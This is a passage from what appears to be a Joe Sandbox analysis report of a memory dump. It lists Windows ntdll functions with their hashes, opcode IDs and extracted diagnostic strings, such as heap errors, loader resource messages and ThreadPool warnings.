                                                                                                                                                • Instruction ID: dc8a34bb6246112781b466ec72bc1cd89d2f822555c44e18b4fe8a285dff8a21
                                                                                                                                                • Opcode Fuzzy Hash: e5bac3d6d80a1e024a25d7eaa2e0602cb293beafe8b3b41df1fe4db5c6981831
                                                                                                                                                • Instruction Fuzzy Hash: 0051C0B5A00B46DFE718DFA4C5407EAB7F8AF54304F10883ED995A7240EB74A545CFA2
                                                                                                                                                Function 3262B5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LU_2$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                • API String ID: 0-2266769028
                                                                                                                                                • Opcode ID: a48815c420b119250e9f8de31448c0e5fa9b3825975cb041fc5ff46e800b9841
                                                                                                                                                • Instruction ID: 18fbd073ec35bc74886b062155bc903e5019573648f77068358c8cc8cca4b7a2
                                                                                                                                                • Opcode Fuzzy Hash: a48815c420b119250e9f8de31448c0e5fa9b3825975cb041fc5ff46e800b9841
                                                                                                                                                • Instruction Fuzzy Hash: 6CB17575A007158FEB19CF69C990B9DB7B1EF84788F248429E815EB790DBB4E890CF05
                                                                                                                                                Function 3262A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                • Opcode ID: 63ffc569bdbcac08fcab0fb1be2e80683d1e04849b16aa031d3fd6fc407f2bfe
                                                                                                                                                • Instruction ID: 4efacaffd0180cc0ae5ff7daf16bf33c35e7beb7f8183de973971a9e700afef7
                                                                                                                                                • Opcode Fuzzy Hash: 63ffc569bdbcac08fcab0fb1be2e80683d1e04849b16aa031d3fd6fc407f2bfe
                                                                                                                                                • Instruction Fuzzy Hash: 86C158B4108382CFE719CF18C940B5AB7E4AF88748F40896AF995DB250EBB4DD49CF56
                                                                                                                                                Function 3265265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 326920C0
                                                                                                                                                • .Local, xrefs: 326527F8
                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 32691FE8
                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32691FE3, 326920BB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                • Opcode ID: a4474b3989669156c0ebeb1719b93cb9eb620e903a8cbcccb2901f9bb7047277
                                                                                                                                                • Instruction ID: 8146e5dd94391ffb1dfe93fd09d689cb07cc0cfce2e0d086eae43203d2f65202
                                                                                                                                                • Opcode Fuzzy Hash: a4474b3989669156c0ebeb1719b93cb9eb620e903a8cbcccb2901f9bb7047277
                                                                                                                                                • Instruction Fuzzy Hash: 21A1C0759013299BDB24CFA4CC84BD9B3B0BF58318F2001EAD80AAB355DB749E85CF95
                                                                                                                                                Function 326263CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32680EB5
                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32680E72
                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32680E2F
                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32680DEC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                • Opcode ID: 7833fc7ba4845a64f3773ec8ee4c600d39a90c7136e3e5c82a63fff25903d4e1
                                                                                                                                                • Instruction ID: ca72b099dee90b231b4df1d80af64d39ad3e1faaf034b3f7bc62706e9d4e2f4f
                                                                                                                                                • Opcode Fuzzy Hash: 7833fc7ba4845a64f3773ec8ee4c600d39a90c7136e3e5c82a63fff25903d4e1
                                                                                                                                                • Instruction Fuzzy Hash: D471DEB19043049FD750CF54C884B8B7BA8EF857A4F404869FD888B28AD775E588CFD6
                                                                                                                                                Function 3261F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                                • Opcode ID: df6bff6a6c929d3b14a8a07fc4d2ca6f0d6f3b74f182efec0825db9ba4fa4767
                                                                                                                                                • Instruction ID: 2139a4b819255bf068328a82491f47630a2846c2f8bc67af0a08e0047e490cd1
                                                                                                                                                • Opcode Fuzzy Hash: df6bff6a6c929d3b14a8a07fc4d2ca6f0d6f3b74f182efec0825db9ba4fa4767
                                                                                                                                                • Instruction Fuzzy Hash: F76136752047809FE316CB68D844F5BB7E8EF84794F140869F9648B2A1CB74F844CBA2
                                                                                                                                                Function 326190F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                                • Opcode ID: dab0e1d95d2aea87d43354074e105bcc0b57c9d0fa9903ed71449e7648fda7ac
                                                                                                                                                • Instruction ID: 48ad55ac686d6183df95e6bdfcded4c0acc6725b8141356d871b5e41c7a4f0cc
                                                                                                                                                • Opcode Fuzzy Hash: dab0e1d95d2aea87d43354074e105bcc0b57c9d0fa9903ed71449e7648fda7ac
                                                                                                                                                • Instruction Fuzzy Hash: 0131F536A01204EFDB05CB98DC84F9AB7B8EF457B4F1444A9E815A7291DB70FA41CA61
                                                                                                                                                Function 32661190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$ee2
                                                                                                                                                • API String ID: 0-850024138
                                                                                                                                                • Opcode ID: 76f32a39945d4f2ebdff97751c73f9c66dc3144fdcbd35409db3b406f0ab5cf1
                                                                                                                                                • Instruction ID: 4b275b2fc248ca094b28ba0eee3931a340c55b8b13a9b2cd72d4264d3791d4fe
                                                                                                                                                • Opcode Fuzzy Hash: 76f32a39945d4f2ebdff97751c73f9c66dc3144fdcbd35409db3b406f0ab5cf1
                                                                                                                                                • Instruction Fuzzy Hash: D731B172901219BBDB12CB95CC40EEEBBBDEF84758F004025E505A72A0DB75DA45CB94
                                                                                                                                                Function 32627072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                • Opcode ID: d83720c7bd4cad9fb9ffc9586a6d9e681dc6906560b4b6ff1f71fa764594c32c
                                                                                                                                                • Instruction ID: 8fd5bdb562ff8b6e2e2718cf06492c24f0567f2312d3b893d6896e8a8b600f4a
                                                                                                                                                • Opcode Fuzzy Hash: d83720c7bd4cad9fb9ffc9586a6d9e681dc6906560b4b6ff1f71fa764594c32c
                                                                                                                                                • Instruction Fuzzy Hash: B35112B4A00715EFEB0ACF64C844BAEB7B0FF44755F1041AAE902A7290DF74A955CF82
                                                                                                                                                Function 3262170C Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3267F6D3
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267F6B1
                                                                                                                                                • HEAP: , xrefs: 3267F6BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                • Opcode ID: 723c5c241f13f71532e8749568a1c018e443cc50367aeb510cd296315d212e2c
                                                                                                                                                • Instruction ID: b579d939cbd247286411c53cfeba404f3471c758a9903e937b40b590c9dca9bb
                                                                                                                                                • Opcode Fuzzy Hash: 723c5c241f13f71532e8749568a1c018e443cc50367aeb510cd296315d212e2c
                                                                                                                                                • Instruction Fuzzy Hash: FF12D174A04341EFE718CF28D480B66B7F5FF45704F24859DE8958B686EB74E841CBA2
                                                                                                                                                Function 326B3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                                • Opcode ID: eed66956757e82010bd2f7f7c87117f1d048c5743e254ebd8615508607e3bb67
                                                                                                                                                • Instruction ID: c43af3b9d29c3126b148f674844108f7177489b2b8eb52dcb1a52fd9fe85ccb2
                                                                                                                                                • Opcode Fuzzy Hash: eed66956757e82010bd2f7f7c87117f1d048c5743e254ebd8615508607e3bb67
                                                                                                                                                • Instruction Fuzzy Hash: 74F191B5B002288BDF25DF16CC80BD9B3B5EF88744F5440E9DA09A7241EBB09E95CF59
                                                                                                                                                Function 32621380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32621648
                                                                                                                                                • HEAP[%wZ]: , xrefs: 32621632
                                                                                                                                                • HEAP: , xrefs: 326214B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                • Opcode ID: 1e698c5e12911350f8f60a0daef2a1283702799cb06b478d7bd72f083b1186af
                                                                                                                                                • Instruction ID: 880a3457d93f8b7c35c6295557c26ea02597dbf3f9a6bbf11a5a14830e7e02cf
                                                                                                                                                • Opcode Fuzzy Hash: 1e698c5e12911350f8f60a0daef2a1283702799cb06b478d7bd72f083b1186af
                                                                                                                                                • Instruction Fuzzy Hash: BFE1F3746083459FEB18CF28C450B7ABBF5EF48704F14889DE896DB286DB34E941CB51
                                                                                                                                                Function 3264F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 326900C7
                                                                                                                                                • RTL: Re-Waiting, xrefs: 32690128
                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 326900F1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                • Opcode ID: 13f20ae2916b39031a4538ef1a53fa3b3ed0e50cc44f3beb5ca48a2aedd69e73
                                                                                                                                                • Instruction ID: 11b943ff98412eb210485786a1a43b80406bfeeb0cbc06a719e43fafa8556954
                                                                                                                                                • Opcode Fuzzy Hash: 13f20ae2916b39031a4538ef1a53fa3b3ed0e50cc44f3beb5ca48a2aedd69e73
                                                                                                                                                • Instruction Fuzzy Hash: 61E1BE746087419FE719CF28C880B6AB7E5BF84368F200A59F5A58B2E1DF75E944CB42
                                                                                                                                                Function 3261A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                • Opcode ID: 2093c1e2c563e94a047b4c2288b5bd0529fe1af40cb567295fdab6b361ca7af7
                                                                                                                                                • Instruction ID: b0032880db4f81668675cf5826e2f3162ec7c6f4a409eddbdba5390a878f3c12
                                                                                                                                                • Opcode Fuzzy Hash: 2093c1e2c563e94a047b4c2288b5bd0529fe1af40cb567295fdab6b361ca7af7
                                                                                                                                                • Instruction Fuzzy Hash: E4A180759016699BDB21DF28CC88BEAB7B8EF04704F1005EAE909A7250DB75AEC4CF54
                                                                                                                                                Function 326FB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • TargetNtPath, xrefs: 326FB3AF
                                                                                                                                                • GlobalizationUserSettings, xrefs: 326FB3B4
                                                                                                                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 326FB3AA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                • API String ID: 0-505981995
                                                                                                                                                • Opcode ID: 240e0f41b5b1da08328d2316f3250d435cd43c7e1726a5a472313c2b69476294
                                                                                                                                                • Instruction ID: 2f40133e76956fcc8d574e9054b87a65a089d54cfc524174c645d778d01fefe1
                                                                                                                                                • Opcode Fuzzy Hash: 240e0f41b5b1da08328d2316f3250d435cd43c7e1726a5a472313c2b69476294
                                                                                                                                                • Instruction Fuzzy Hash: F5618F72D41229BBDB21DF54DC98BD9B7B8AF18714F4101E9EA08AB250CB74DE84CF94
                                                                                                                                                Function 3261F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3267E455
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267E435
                                                                                                                                                • HEAP: , xrefs: 3267E442
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                                • Opcode ID: ac4fb31e7da2c8a88f8e4f17756645fb0ab3aea864cd953a479d103ef31b56a9
                                                                                                                                                • Instruction ID: 6e270b98baf9d7633198b7bf99d0bab572a6d433c087e26b83aa836905c0ee7b
                                                                                                                                                • Opcode Fuzzy Hash: ac4fb31e7da2c8a88f8e4f17756645fb0ab3aea864cd953a479d103ef31b56a9
                                                                                                                                                • Instruction Fuzzy Hash: C0512135600784EFE316CBA8D894F9ABBF8FF05354F0444A5E9408B692DB78FA44CB91
                                                                                                                                                Function 32641514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • LdrpCompleteMapModule, xrefs: 3268A39D
                                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3268A3A7
                                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3268A396
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                                • Opcode ID: 40363acf170e070b1040067e4977e0c78124956ee279669d9ed1a8e58ea38fad
                                                                                                                                                • Instruction ID: 6a77af8be71ccca284f2738fa750e267c16c956d0b82ef4860c42feb8a30ad2f
                                                                                                                                                • Opcode Fuzzy Hash: 40363acf170e070b1040067e4977e0c78124956ee279669d9ed1a8e58ea38fad
                                                                                                                                                • Instruction Fuzzy Hash: 075123B4A00741DBE71ACB59C884B8A77E4AF44B58F1042E5EDA19B2E2DF74E900CB46
                                                                                                                                                Function 326CD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • HEAP[%wZ]: , xrefs: 326CD792
                                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 326CD7B2
                                                                                                                                                • HEAP: , xrefs: 326CD79F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                                • Opcode ID: ca69bf009e6dfbed54df89cd222f9b0918dbfa3e2a43d27057294429a45d158d
                                                                                                                                                • Instruction ID: 088de3cb41aaeec9a72e868f0a7d0e246b1c60a3d99e3eb94a270d5336ee7505
                                                                                                                                                • Opcode Fuzzy Hash: ca69bf009e6dfbed54df89cd222f9b0918dbfa3e2a43d27057294429a45d158d
                                                                                                                                                • Instruction Fuzzy Hash: 9151D6791003709AF358FA2AC84477273E1DF45688F61486DE4C58B587EA36E847DB71
                                                                                                                                                Function 32621A24 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3267F96A
                                                                                                                                                • HEAP[%wZ]: , xrefs: 3267F952
                                                                                                                                                • HEAP: , xrefs: 3267F95F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                • API String ID: 0-1596344177
                                                                                                                                                • Opcode ID: 1d3d96ceac2678e543e9b692a64a30be17ebb89b4245023f05c40ec86f00a10d
                                                                                                                                                • Instruction ID: d8e09a89e8d71a5a65d8e95d08e8d49d45540fb1032fb674658811af037597ae
                                                                                                                                                • Opcode Fuzzy Hash: 1d3d96ceac2678e543e9b692a64a30be17ebb89b4245023f05c40ec86f00a10d
                                                                                                                                                • Instruction Fuzzy Hash: 7851BC34A08215EFEB08CF68C480B6ABBB5FF49714F1581E9D8549F246DB71E942CFA1
                                                                                                                                                Function 3261753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
